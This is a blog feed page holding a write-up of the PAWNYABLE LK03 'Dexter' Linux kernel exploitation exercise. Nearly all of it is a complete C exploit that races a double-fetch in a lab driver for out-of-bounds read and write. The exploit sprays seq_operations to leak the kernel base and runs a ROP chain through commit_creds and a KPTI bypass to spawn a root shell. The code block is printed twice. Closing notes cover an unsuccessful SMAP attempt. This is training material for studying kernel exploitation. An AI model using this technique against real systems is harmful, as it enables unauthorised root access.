Heap Overflow on Uniguri's Blog /tags/heap-overflow/ Recent content in Heap Overflow on Uniguri's Blog Hugo -- gohugo.io en-us Tue, 14 Jan 2025 09:31:17 +0000 PAWNYABLE LK03: Dexter /posts/kernel/pawnyable/pawnyable_lk03/ Tue, 14 Jan 2025 09:31:17 +0000 /posts/kernel/pawnyable/pawnyable_lk03/ <hr> <h2 id="lk03-dexter">LK03 (Dexter)</h2> <div class="collapsable-code"> <input id="784519362" type="checkbox" checked /> <label for="784519362"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_seq_operations_without_smap.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;pthread.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define VULN_DEV_DEVICE_NAME &#34;dexter&#34; #define VULN_DEV_BUFFER_SIZE 0x20 #define VULN_DEV_CMD_GET 0xdec50001 #define VULN_DEV_CMD_SET 0xdec50002 #define KERNEL_BASE 0xffffffff81000000 #define SEQ_OPERATIONS_START 0xffffffff81170f80 #define SEQ_OPERATIONS_START_OFFSET (SEQ_OPERATIONS_START - KERNEL_BASE) #define FAKE_STACK_ADDRESS (0xf6000000) #define MOV_ESP_0xf6000000_OFFSET (0xffffffff81520224 - KERNEL_BASE) #define MOV_ESP_0xf6000000 (kernel_base + MOV_ESP_0xf6000000_OFFSET) #define POP_RDI_OFFSET (0xffffffff8109b0cd - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff810729b0 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_OFFSET (0xffffffff8110d88b - KERNEL_BASE) #define POP_RCX (kernel_base + POP_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff8163d0ab - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff81072810 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) static void fatal(const char* msg) { perror(msg); exit(-1); } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%016lx, user_ss: 0x%016lx, user_sp: 0x%016lx, &#34; &#34;user_rflags: &#34; &#34;0x%016lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } typedef struct { char* ptr; size_t len; } request_t; static int vuln_dev_fd = -1; static request_t vuln_dev_req = { 0, }; static int vuln_dev_set(void* ptr, size_t len) { vuln_dev_req.ptr = ptr; vuln_dev_req.len = len; return ioctl(vuln_dev_fd, VULN_DEV_CMD_SET, &amp;vuln_dev_req); } static int vuln_dev_get(void* ptr, size_t len) { vuln_dev_req.ptr = ptr; vuln_dev_req.len = len; return ioctl(vuln_dev_fd, VULN_DEV_CMD_GET, &amp;vuln_dev_req); } static int race_success = 0; static void* vuln_dev_race(void* arg) { const size_t len = (size_t)arg; while (!race_success) { vuln_dev_req.len = len; usleep(1); } return NULL; } static void vuln_dev_oob_read(void* out, size_t len) { if (len &lt;= VULN_DEV_BUFFER_SIZE) { vuln_dev_get(out, len); return; } pthread_t th; race_success = 0; const uint64_t cur_rand_val = 0xdeadbeefcafebebe + rand(); *(uint64_t*)(out + VULN_DEV_BUFFER_SIZE) = cur_rand_val; pthread_create(&amp;th, NULL, &amp;vuln_dev_race, (void*)len); while (!race_success) { if (vuln_dev_get(out, VULN_DEV_BUFFER_SIZE)) { continue; } if (*(uint64_t*)(out + VULN_DEV_BUFFER_SIZE) != cur_rand_val) { race_success = 1; } } pthread_join(th, NULL); } static void vuln_dev_oob_write(void* data, size_t len) { if (len &lt;= VULN_DEV_BUFFER_SIZE) { vuln_dev_set(data, len); return; } pthread_t th; race_success = 0; const uint64_t cur_rand_val = 0xdeadbeefcafebebe + rand(); void* tmp = malloc(len); *(uint64_t*)(tmp + VULN_DEV_BUFFER_SIZE) = cur_rand_val; pthread_create(&amp;th, NULL, &amp;vuln_dev_race, (void*)len); while (!race_success) { if (vuln_dev_set(data, VULN_DEV_BUFFER_SIZE)) { continue; } while (1) { if (vuln_dev_get(tmp, VULN_DEV_BUFFER_SIZE)) { continue; } if (*(uint64_t*)(tmp + VULN_DEV_BUFFER_SIZE) != cur_rand_val) { break; } } if (!memcmp(tmp, data, len)) { race_success = 1; } } free(tmp); pthread_join(th, NULL); } static uint64_t kernel_base = 0; int main() { char char_buf[0x800]; uint64_t* uint64_buf = (uint64_t*)char_buf; srand(time(NULL)); save_state(); int seq_ops_spray[800] = { 0, }; for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]) / 2; ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } vuln_dev_fd = open(&#34;/dev/&#34; VULN_DEV_DEVICE_NAME, O_RDONLY); if (vuln_dev_fd &lt; 0) { fatal(&#34;open &#34; VULN_DEV_DEVICE_NAME); } for (int i = sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]) / 2; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } int seq_ops_start_idx = -1; vuln_dev_oob_read(char_buf, sizeof(char_buf)); for (int i = 0; i &lt; sizeof(char_buf) / sizeof(uint64_t); ++i) { if ((uint64_buf[i] &amp; SEQ_OPERATIONS_START_OFFSET) == SEQ_OPERATIONS_START_OFFSET) { kernel_base = uint64_buf[i] - SEQ_OPERATIONS_START_OFFSET; seq_ops_start_idx = i; break; } } if (seq_ops_start_idx == -1 || kernel_base == 0 || (kernel_base &amp; 0xFFFFF) != 0) { fatal(&#34;kernel_base&#34;); } printf(&#34;[+] kernel_base: 0x%16lx @ idx: %d\n&#34;, kernel_base, seq_ops_start_idx); void* fake_stack = mmap( (void*)(FAKE_STACK_ADDRESS - 0x8000), 0x10000, PROT_READ | PROT_WRITE, MAP_POPULATE | MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); uint64_t* rop = (uint64_t*)(FAKE_STACK_ADDRESS); *rop++ = POP_RDI; *rop++ = 0; *rop++ = PREPARE_KERNEL_CRED; *rop++ = POP_RCX; *rop++ = 0; *rop++ = MOV_RDI_RAX_REP; *rop++ = COMMIT_CREDS; *rop++ = BYPASS_KPTI; *rop++ = 0xdeadbeefcafebe01; *rop++ = 0xdeadbeefcafebe02; *rop++ = (uint64_t)(get_shell); *rop++ = (uint64_t)(user_cs); *rop++ = (uint64_t)(user_rflags); *rop++ = (uint64_t)(user_sp); *rop++ = (uint64_t)(user_ss); uint64_buf[seq_ops_start_idx] = MOV_ESP_0xf6000000; vuln_dev_oob_write(uint64_buf, 8 * (seq_ops_start_idx + 1)); for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { read(seq_ops_spray[i], char_buf, 0x100); } for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { close(seq_ops_spray[i]); } return 0; }</code></pre></div> <h2 id="exercise-with-smap">Exercise (with SMAP)</h2> <p>I tried writing exploit code with SMAP enabled. But I failed. I think that any registers cannot be controlled when using <a href="https://elixir.bootlin.com/linux/v5.17.1/source/include/linux/seq_file.h#L32"><code>seq_operations</code></a> to control RIP.</p> <hr> <h2 id="lk03-dexter">LK03 (Dexter)</h2> <div class="collapsable-code"> <input id="784519362" type="checkbox" checked /> <label for="784519362"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_seq_operations_without_smap.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;pthread.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define VULN_DEV_DEVICE_NAME &#34;dexter&#34; #define VULN_DEV_BUFFER_SIZE 0x20 #define VULN_DEV_CMD_GET 0xdec50001 #define VULN_DEV_CMD_SET 0xdec50002 #define KERNEL_BASE 0xffffffff81000000 #define SEQ_OPERATIONS_START 0xffffffff81170f80 #define SEQ_OPERATIONS_START_OFFSET (SEQ_OPERATIONS_START - KERNEL_BASE) #define FAKE_STACK_ADDRESS (0xf6000000) #define MOV_ESP_0xf6000000_OFFSET (0xffffffff81520224 - KERNEL_BASE) #define MOV_ESP_0xf6000000 (kernel_base + MOV_ESP_0xf6000000_OFFSET) #define POP_RDI_OFFSET (0xffffffff8109b0cd - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff810729b0 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_OFFSET (0xffffffff8110d88b - KERNEL_BASE) #define POP_RCX (kernel_base + POP_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff8163d0ab - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff81072810 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) static void fatal(const char* msg) { perror(msg); exit(-1); } uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); printf( &#34;[*] user_cs: 0x%016lx, user_ss: 0x%016lx, user_sp: 0x%016lx, &#34; &#34;user_rflags: &#34; &#34;0x%016lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); } static void get_shell() { puts(&#34;[+] Get shell!&#34;); char* argv[] = {&#34;/bin/sh&#34;, NULL}; char* envp[] = {NULL}; execve(&#34;/bin/sh&#34;, argv, envp); } typedef struct { char* ptr; size_t len; } request_t; static int vuln_dev_fd = -1; static request_t vuln_dev_req = { 0, }; static int vuln_dev_set(void* ptr, size_t len) { vuln_dev_req.ptr = ptr; vuln_dev_req.len = len; return ioctl(vuln_dev_fd, VULN_DEV_CMD_SET, &amp;vuln_dev_req); } static int vuln_dev_get(void* ptr, size_t len) { vuln_dev_req.ptr = ptr; vuln_dev_req.len = len; return ioctl(vuln_dev_fd, VULN_DEV_CMD_GET, &amp;vuln_dev_req); } static int race_success = 0; static void* vuln_dev_race(void* arg) { const size_t len = (size_t)arg; while (!race_success) { vuln_dev_req.len = len; usleep(1); } return NULL; } static void vuln_dev_oob_read(void* out, size_t len) { if (len &lt;= VULN_DEV_BUFFER_SIZE) { vuln_dev_get(out, len); return; } pthread_t th; race_success = 0; const uint64_t cur_rand_val = 0xdeadbeefcafebebe + rand(); *(uint64_t*)(out + VULN_DEV_BUFFER_SIZE) = cur_rand_val; pthread_create(&amp;th, NULL, &amp;vuln_dev_race, (void*)len); while (!race_success) { if (vuln_dev_get(out, VULN_DEV_BUFFER_SIZE)) { continue; } if (*(uint64_t*)(out + VULN_DEV_BUFFER_SIZE) != cur_rand_val) { race_success = 1; } } pthread_join(th, NULL); } static void vuln_dev_oob_write(void* data, size_t len) { if (len &lt;= VULN_DEV_BUFFER_SIZE) { vuln_dev_set(data, len); return; } pthread_t th; race_success = 0; const uint64_t cur_rand_val = 0xdeadbeefcafebebe + rand(); void* tmp = malloc(len); *(uint64_t*)(tmp + VULN_DEV_BUFFER_SIZE) = cur_rand_val; pthread_create(&amp;th, NULL, &amp;vuln_dev_race, (void*)len); while (!race_success) { if (vuln_dev_set(data, VULN_DEV_BUFFER_SIZE)) { continue; } while (1) { if (vuln_dev_get(tmp, VULN_DEV_BUFFER_SIZE)) { continue; } if (*(uint64_t*)(tmp + VULN_DEV_BUFFER_SIZE) != cur_rand_val) { break; } } if (!memcmp(tmp, data, len)) { race_success = 1; } } free(tmp); pthread_join(th, NULL); } static uint64_t kernel_base = 0; int main() { char char_buf[0x800]; uint64_t* uint64_buf = (uint64_t*)char_buf; srand(time(NULL)); save_state(); int seq_ops_spray[800] = { 0, }; for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]) / 2; ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } vuln_dev_fd = open(&#34;/dev/&#34; VULN_DEV_DEVICE_NAME, O_RDONLY); if (vuln_dev_fd &lt; 0) { fatal(&#34;open &#34; VULN_DEV_DEVICE_NAME); } for (int i = sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]) / 2; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { seq_ops_spray[i] = open(&#34;/proc/self/stat&#34;, O_RDONLY); } int seq_ops_start_idx = -1; vuln_dev_oob_read(char_buf, sizeof(char_buf)); for (int i = 0; i &lt; sizeof(char_buf) / sizeof(uint64_t); ++i) { if ((uint64_buf[i] &amp; SEQ_OPERATIONS_START_OFFSET) == SEQ_OPERATIONS_START_OFFSET) { kernel_base = uint64_buf[i] - SEQ_OPERATIONS_START_OFFSET; seq_ops_start_idx = i; break; } } if (seq_ops_start_idx == -1 || kernel_base == 0 || (kernel_base &amp; 0xFFFFF) != 0) { fatal(&#34;kernel_base&#34;); } printf(&#34;[+] kernel_base: 0x%16lx @ idx: %d\n&#34;, kernel_base, seq_ops_start_idx); void* fake_stack = mmap( (void*)(FAKE_STACK_ADDRESS - 0x8000), 0x10000, PROT_READ | PROT_WRITE, MAP_POPULATE | MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); uint64_t* rop = (uint64_t*)(FAKE_STACK_ADDRESS); *rop++ = POP_RDI; *rop++ = 0; *rop++ = PREPARE_KERNEL_CRED; *rop++ = POP_RCX; *rop++ = 0; *rop++ = MOV_RDI_RAX_REP; *rop++ = COMMIT_CREDS; *rop++ = BYPASS_KPTI; *rop++ = 0xdeadbeefcafebe01; *rop++ = 0xdeadbeefcafebe02; *rop++ = (uint64_t)(get_shell); *rop++ = (uint64_t)(user_cs); *rop++ = (uint64_t)(user_rflags); *rop++ = (uint64_t)(user_sp); *rop++ = (uint64_t)(user_ss); uint64_buf[seq_ops_start_idx] = MOV_ESP_0xf6000000; vuln_dev_oob_write(uint64_buf, 8 * (seq_ops_start_idx + 1)); for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { read(seq_ops_spray[i], char_buf, 0x100); } for (int i = 0; i &lt; sizeof(seq_ops_spray) / sizeof(seq_ops_spray[0]); ++i) { close(seq_ops_spray[i]); } return 0; }</code></pre></div> <h2 id="exercise-with-smap">Exercise (with SMAP)</h2> <p>I tried writing exploit code with SMAP enabled. But I failed. I think that any registers cannot be controlled when using <a href="https://elixir.bootlin.com/linux/v5.17.1/source/include/linux/seq_file.h#L32"><code>seq_operations</code></a> to control RIP.</p> <p>My inference to exploit with SMAP:</p> <ol> <li>Find <code>kmalloc-32</code> object containing reference count</li> <li>Using heap overflow, make UAF object.</li> <li>Do cross-cache attack and exploit UAF.</li> </ol> <p>Or just find a good <code>kmalloc-32</code> object with RIP controll primitives with register controll or AAW primitives, ETC. But I cannot find the good object&hellip;</p> <p>Currently, I does not know what is cross-cache attack and how SLUB works. Therefore I decide to delay solving this exercise until I study SLUB and cross-cache attack, ETC.</p> <h2 id="reference">Reference</h2> <ul> <li><a href="https://pawnyable.cafe/linux-kernel/LK03/double_fetch.html">https://pawnyable.cafe/linux-kernel/LK03/double_fetch.html</a></li> </ul>